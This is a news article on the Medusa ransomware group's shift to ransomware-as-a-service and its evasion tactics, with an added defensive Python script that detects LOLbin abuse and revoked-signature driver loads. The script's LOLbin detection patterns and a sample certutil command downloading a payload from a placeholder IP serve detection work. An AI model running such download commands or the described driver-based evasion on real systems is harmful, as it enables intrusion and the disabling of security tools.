
Medusa Ransomware Targets Big Firms in 2025 Rise

The Growing Threat of Medusa Ransomware Attacks

In mid-2024, the Medusa ransomware group made a significant shift in its operations. Moving away from tightly controlled, internal attacks, the group embraced a ransomware-as-a-service (RaaS) model. By opening its platform to affiliates and splitting profits, Medusa quickly expanded its reach. This change mirrored the way franchises scale businesses—bringing in partners while growing more powerful.

Since adopting the RaaS approach, attacks using Medusa’s infrastructure surged by 43% last year. That momentum hasn’t slowed, and 2025 is on track to see an even bigger spike. So far, between 300 and 400 organizations have been compromised, many in high-stakes sectors like healthcare and manufacturing, where disruptions carry serious consequences.

According to Greg Linares, principal threat intelligence analyst at Huntress, this evolution has helped Medusa move upmarket. What began as a group targeting small firms has grown into a threat to large enterprises. He notes the shift became obvious around August 2024, when the group bounced back from a lull and began ramping up operations aggressively.

This rising wave of attacks hasn’t gone unnoticed. Just last month, agencies including the FBI, CISA, and MS-ISAC issued a joint alert warning that Medusa had already impacted hundreds of victims and was gaining ground quickly.

Researchers at Broadcom, who refer to the group internally as “Spearwing,” have also tracked the sharp rise. Their analysts report that Medusa has shown consistent year-over-year growth since 2023. Brigid O’Gorman from Broadcom’s Symantec Threat Hunter Team points out that Medusa’s activity doubled in the first two months of 2025 compared to the same period in 2024. This spike may be tied to recent law enforcement takedowns of groups like LockBit and Noberus, which left a gap in the market for cybercriminals to fill.

Part of what makes Medusa so effective is its use of third-party tools and techniques that minimize the group’s own development costs. Rather than building custom malware, the group relies on so-called “living off the land” tools: software that already exists in the operating system, or widely available binaries, known as LOLbins. Linares explains that by using these existing tools, Medusa avoids having to maintain proprietary code while also reducing the chance of detection. This allows affiliates to launch attacks more efficiently and cheaply.

Medusa also brings a few more advanced tactics to the table. According to Elastic’s threat research team, the group has used a driver signed with a revoked code-signing certificate from a Chinese vendor. The driver mimics a legitimate signature from CrowdStrike, enabling attackers to sneak in a vulnerable driver and exploit it to bypass security protections. Known as a bring your own vulnerable driver (BYOVD) attack, this method allows Medusa to undermine endpoint security tools that would otherwise block or detect suspicious activity.
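The two behaviours described in the preceding paragraphs, LOLbin abuse and the loading of a driver whose signature does not check out, are both things a defender can look for in endpoint telemetry. The following is an added example, not code from the article or from any vendor named in it: a small triage pass over constructed endpoint events. The field names loosely follow Sysmon-style ProcessCreate and DriverLoad records, the LOLbin list and the argument heuristics are an assumption kept deliberately short, and every event below is constructed for illustration rather than taken from real telemetry.

```python
"""Added example (not from the article): flag LOLbin abuse and untrusted
driver loads in constructed endpoint events.

Field names follow Sysmon-style ProcessCreate / DriverLoad records, which is an
assumption; the sample events and the heuristics are constructed for the demo.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Hypothetical short list of well-known living-off-the-land binaries.
LOLBINS = {"certutil.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
           "bitsadmin.exe", "wmic.exe"}

# Command-line fragments that are rarely benign for that binary (assumption).
SUSPICIOUS_ARGS = {
    "certutil.exe": ("-urlcache", "-decode", "-encode"),
    "rundll32.exe": ("javascript:", "url.dll"),
    "regsvr32.exe": ("/i:http", "scrobj.dll"),
    "mshta.exe": ("http", "vbscript:"),
    "bitsadmin.exe": ("/transfer",),
    "wmic.exe": ("process call create",),
}

# Signature states that should never be accepted for a kernel driver (assumption).
UNTRUSTED_SIGNATURE_STATES = {"revoked", "expired", "unavailable", "errors"}


@dataclass
class Finding:
    rule: str
    event: Dict[str, str]


def check_process(ev: Dict[str, str]) -> Optional[Finding]:
    """Flag a LOLbin when its command line carries a suspicious fragment."""
    image = ev.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in LOLBINS:
        return None
    cmd = ev.get("CommandLine", "").lower()
    if any(tok in cmd for tok in SUSPICIOUS_ARGS.get(image, ())):
        return Finding("lolbin_suspicious_args", ev)
    return None


def check_driver(ev: Dict[str, str]) -> Optional[Finding]:
    """Flag a driver load whose signature is missing or no longer trusted.

    A revoked certificate still carries the signer's name, so a record can show
    a familiar vendor string while SignatureStatus is anything but Valid; the
    status, not the name, is what the check keys on.
    """
    signed = ev.get("Signed", "").lower() == "true"
    status = ev.get("SignatureStatus", "").lower()
    if not signed or status in UNTRUSTED_SIGNATURE_STATES:
        return Finding("driver_untrusted_signature", ev)
    return None


def triage(events: List[Dict[str, str]]) -> List[Finding]:
    """Run the matching check for each event and collect the findings."""
    checks = {"ProcessCreate": check_process, "DriverLoad": check_driver}
    findings = []
    for ev in events:
        check = checks.get(ev.get("EventType", ""))
        if check is None:
            continue
        finding = check(ev)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample events (203.0.113.0/24 is a documentation address range).
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/stage.bin stage.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventType": "ProcessCreate",          # benign certutil use: no finding
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -store My",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventType": "DriverLoad",             # vendor name present, cert revoked
     "ImageLoaded": r"C:\Windows\Temp\drv.sys",
     "Signed": "true", "Signature": "CrowdStrike, Inc.",
     "SignatureStatus": "Revoked"},
    {"EventType": "DriverLoad",             # ordinary valid driver: no finding
     "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Signed": "true", "Signature": "Microsoft Windows",
     "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f.rule, "->", f.event.get("Image") or f.event.get("ImageLoaded"))
```

Run as-is, the script reports the certutil download and the revoked-certificate driver load and stays quiet on the two benign records. The design point is in `check_driver`: because a revoked certificate still names its original signer, an allowlist keyed on vendor name would wave the spoofed driver through, so the decision rests on the signature status and the Signed flag, which is the kind of overlapping check the article's sources argue for.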

Devon Kerr, director of threat research at Elastic, warns that such techniques require organizations to broaden their cybersecurity visibility. Focusing on just one area—like endpoints or network traffic—is no longer enough. Companies should monitor multiple layers across their infrastructure, from cloud environments to physical devices, to spot and stop these evasive threats.

Kerr also believes the current economic climate is indirectly fueling the rise in RaaS activity. When job markets shrink and financial pressures grow, more individuals may turn to cybercrime. He notes that spikes in criminal behavior often follow periods of economic instability, citing the 2008 housing crash and the COVID-19 pandemic as previous examples. Today’s rise in affiliate-based ransomware seems to follow the same pattern.

With the global economy in flux, Kerr urges businesses to invest in multi-layered visibility across their systems. Relying on a single line of defense won’t cut it, especially when modern threats are designed to disable or bypass security tools. Enterprises need overlapping sensors and technologies to detect early signs of intrusion, and they should assume attackers will actively try to neutralize defenses along the way.

For now, Medusa’s momentum shows no signs of slowing. The group’s evolution into a scalable, efficient criminal operation has turned it into one of the most active and dangerous players in the ransomware landscape. And unless defenders adapt just as quickly, the number of victims will only continue to grow.
